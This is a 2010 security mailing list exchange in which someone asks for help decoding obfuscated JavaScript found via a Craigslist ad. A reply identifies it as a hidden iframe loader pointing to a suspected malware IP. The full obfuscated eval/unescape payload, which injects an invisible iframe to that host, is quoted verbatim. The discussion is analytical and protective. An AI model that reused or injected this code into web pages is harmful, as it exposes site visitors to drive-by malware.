PaulDotCom mailing list archives

Decode this Javascript?

From: d.auclair at utoronto.ca (David Auclair)
Date: Wed, 7 Apr 2010 09:05:19 -0400

Warning: Link may lead to malware!
It loads an iframe with a source of hxxp://201.235.235.174/index.php

Btw: malzilla can analyze many types of obfuscated javascript, such as this one

-Dave

-----Original Message-----
From: pauldotcom-bounces at mail.pauldotcom.com [mailto:pauldotcom-bounces at mail.pauldotcom.com] On Behalf
Of Rhonda Kreklau
Sent: Tuesday, April 06, 2010 10:11 PM
To: pauldotcom at mail.pauldotcom.com
Subject: [Pauldotcom] Decode this Javascript?

I found this by following a Craigslist ad asking for redesign job on a
website...can someone decode it for me...

eval(unescape("document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115
%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C50%2C48%2C49%2C46%2C50%2C51%2C53%2C46%2
C50%2C51%2C53%2C46%2C49%2C55%2C52%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%
2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2
C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B"));

Thanks

Rhonda
_______________________________________________
Pauldotcom mailing list
Pauldotcom at mail.pauldotcom.com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com

Current thread:

Decode this Javascript? Rhonda Kreklau (Apr 06)
- Decode this Javascript? Robin Wood (Apr 07)
- Decode this Javascript? Rick Hayes (Apr 07)
- Decode this Javascript? Jim Halfpenny (Apr 07)
- Decode this Javascript? Ulisses Castro (Apr 07)
- Decode this Javascript? David Auclair (Apr 07)
- Decode this Javascript? Pat (Apr 07)
- Decode this Javascript? mailing lists (Apr 07)
- Decode this Javascript? Chris Blazek (Apr 07)
  - Decode this Javascript? Rhonda Kreklau (Apr 07)
    - Decode this Javascript? Nicholas B. (Apr 07)